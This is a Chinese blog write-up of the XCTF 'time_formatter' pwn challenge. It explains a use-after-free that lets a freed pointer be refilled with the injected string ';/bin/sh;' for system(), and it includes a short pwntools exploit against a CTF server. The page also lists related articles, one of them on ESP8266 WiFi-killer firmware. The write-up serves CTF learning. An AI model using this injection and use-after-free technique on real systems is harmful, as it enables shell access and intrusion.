[攻防世界 pwn]——time_formatter(内涵peak小知识)

最新推荐文章于 2021-05-13 00:22:58 发布
最新推荐文章于 2021-05-13 00:22:58 发布
阅读量295 收藏
点赞数
分类专栏: # 攻防世界 # 堆利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113889057
版权

[攻防世界 pwn]——time_formatter

peak小知识

  1. 堆空间释放后,指针不指向NULL,就仍指向该空间,并且重新申请的堆空间就是最先释放的堆空间
  2. Linux中 echo “;ls;cat flag;/bin/sh;”
    ls ,cat flag , /bin/sh, 会挨个执行

老规矩还是先checksec一下
在这里插入图片描述
在IDA中查看一下反汇编的源代码
在这里插入图片描述
在这里插入图片描述
sub_400D26()函数是为了让你们输入选项。

我们仔细看看各个代码,

选项1,申请空间
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

选项5,释放ptr 和value的空间,但是都没有指向NULL。指针仍然指向原空间。
在这里插入图片描述
选项4里面有我们, 心中年年不忘的system函数。首先它判断ptr是否为空,我们只要让ptr等于"/bin/sh"就可以获得shell了
在这里插入图片描述
在选项3中,也是申请一个新的堆空间,ptr释放后没有指向NULL, 新申请的空间也就是ptr指向的空间
在这里插入图片描述
在这里插入图片描述

思路

  • 选择选项1,申请空间
  • 选择选项5,释放空间,但是不退出程序
  • 选择选项3,将释放的空间重新申请,并写入 “/bin/sh”
  • 选择选项4,获得shell

exploit

from pwn import * 
p = remote("111.200.241.244",57231)

p.sendlineafter("> ","1")
p.sendlineafter("Format: ","A")
p.sendlineafter("> ","5")
p.sendlineafter("Are you sure you want to exit (y/N)? ",'N')
p.sendlineafter("> ","3")
p.sendlineafter("Time zone: ","';/bin/sh;'")
p.sendlineafter("> ","4")
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 time_formatter
10-25 556
1 题目 2 分析 首先,找到漏洞点: 通过构造command,我们可以执行系统命令。所以对于ptr,我们希望他是这样的:';/bin/sh;' 这样我们就能通过system方法执行/bin/sh。于是,接下来的工作就是如何让ptr等于我们需要的值。 需要注意。ptr,也就是time format,他的输入时有字符检查的: 可以看到,我们的“;”不在允许范围内,所以通过输入直接构建ptr是不可能的。 这道题目的突破点其实就在退出函数这里: 可以看到,退出函...
攻防世界 Pwn time_formatter
MrTreebook的博客
03-06 375
攻防世界 Pwn time_formatter1.checksec分析2.IDA分析menu在 print_your_time 找到有关system函数控制好参数ptr即可拿到权限输入限制UAF利用思路3.exp 1.checksec分析 2.IDA分析 menu puts("Welcome to Mary's Unix Time Formatter!"); do { while ( 2 ) { puts("1) Set a time format.");
XCTF PWN高手进阶区之time_formatter
neuisf的博客
01-29 349
这是第一道堆溢出题目, 程序执行选项1时,通过strdup函数申请了一块内存保存用户输入的时间格式字符串,执行选项三时,同样 通过strdup申请了一块内存用于存放用户输入的时区字符串,执行选项五时,首先释放这两块内存,然后,询问是否真的退出,此时,用户选择不退出时,程序继续回到开始执行。而此时,前两块申请的内存已被释放,未将指针置为NULL。造成UAF漏洞。 由于选项一读取用户输入内容时,会过滤...
攻防世界pwn高手进阶区-time_formatter
CSDN_sunrise的博客
10-31 629
文章目录time_formatter伪代码main函数功能1--set_time_format功能2--set_time功能3--set_time_zone功能4--print_time功能5--free_and_exitpayload说明exp time_formatter 伪代码 main函数 循环输出菜单并根据输入跳转执行不同功能。 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __gid_t v3; // eax FI
2019XCTF攻防世界之萌新入坑(time_formatter
weixin_44113469的博客
04-11 1874
time_formatter
awd攻防比赛总结——3s_NwGeek.docx
09-30
AWD 攻防比赛总结 AWD 攻防比赛总结是关于一场线下的 AWD 攻防对抗赛的总结报告,报告作者 3s_NwGeek 分享了在比赛中的经验和心得。该报告主要集中在 Web 环境下的个人领悟到的技巧和心得。 首先,作者介绍了比赛...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
在网络安全领域,特别是针对Pwn(破解)类竞赛,"jmp_rsp"是一个常见的技术概念,主要涉及栈溢出漏洞的利用。广东大学生网络攻防大赛中的这个“jmp_rsp”题目显然是设计来测试参赛者对这类漏洞的理解和利用能力。...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
time_formatter [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列20
重新启程
12-25 830
题目地址:time_formatter 速度挺快的,已经赶上高手进阶区的第九题了! 废话不说,看看题目先 可以看到星星已经到了三颗星了。表示有点不一样的地方了。 照例看下安全机制 [*] '/ctf/work/python/time_formatter/807522d1647f4f0b8b26d6c1530d72b7' Arch: amd64-64-little ...
time 格式化 linux,[20201112]time TIMEFORMAT格式.txt
weixin_34058060的博客
05-13 347
[20201112]time TIMEFORMAT格式.txt--//time命令缺省显示如下:# time echo 2^1000000 | bc > /dev/nullreal 0m4.614suser 0m4.598ssys 0m0.006s--//实际上可以显示格式使用TIMEFORMAT环境变量:# TIMEFORMAT="%3lU user + %3lS s...
.Net反序列化漏洞之BinaryFormatter
weixin_33978016的博客
11-28 537
https://googleprojectzero.blogspot.com.es/2017/04/exploiting-net-managed-dcom.html .Net反序列化导致RCE的样例,有两点限制: BinaryFormatter::Deserialize反序列化的内容用户可控 .Net SDK大于等于4.5 using System; using System.Collecti...
LosFormatter反序列化漏洞
UKK
06-18 239
LosFormatter反序列化漏洞 http://www.ifind.cc/view/224
plaidctf-2016 unix_time_formatter uaf漏洞分析
小强的博客
11-15 961
源代码下载及其他writeup参考: https://github.com/ctfs/write-ups-2016/tree/master/plaidctf-2016/pwnable/unix_time_formatter-76 直接去print_time函数(自定义)查看: 在system中执行command命令,command字符串通过snprin
BinaryFormatter反序列化漏洞
UKK
06-20 2730
BinaryFormatter反序列化漏洞 http://www.ifind.cc/view/230
[攻防世界 pwn]——guess_num
Y_peak的博客
02-19 1115
[攻防世界 pwn]——guess_num15 [攻防世界 pwn]——level0 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX, canary, PIE 好家伙 在IDA中发现 我们只要利用gets函数将seed[0]给覆盖掉就可以了, 间距为0x20 用C语言写个小demo #include <stdio.h> #include <stdlib.h> int main() { int n, b;
[攻防世界 pwn]——monkey
Y_peak的博客
02-27 761
[攻防世界 pwn]——monkey 题目地址:https://adworld.xctf.org.cn/ 题目: 额,怎么说呢这道题。checksec没什么大不了的 但是再IDA中就懵了,好大呀。好多文件。进入mian函数,也没有看很明白。准备运行程序看看到底是干什么的,帮助分析一下 输入尝试输入aaaa,发现返回的东西没有被定义。我们在Linux命令中有时命令输入错误也是这样。猜测它可能直接让输入命令。结果输入help可以,但是有的命令可以有的不可以 在IDA中查看一下字符串,因为它可以输入的字
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值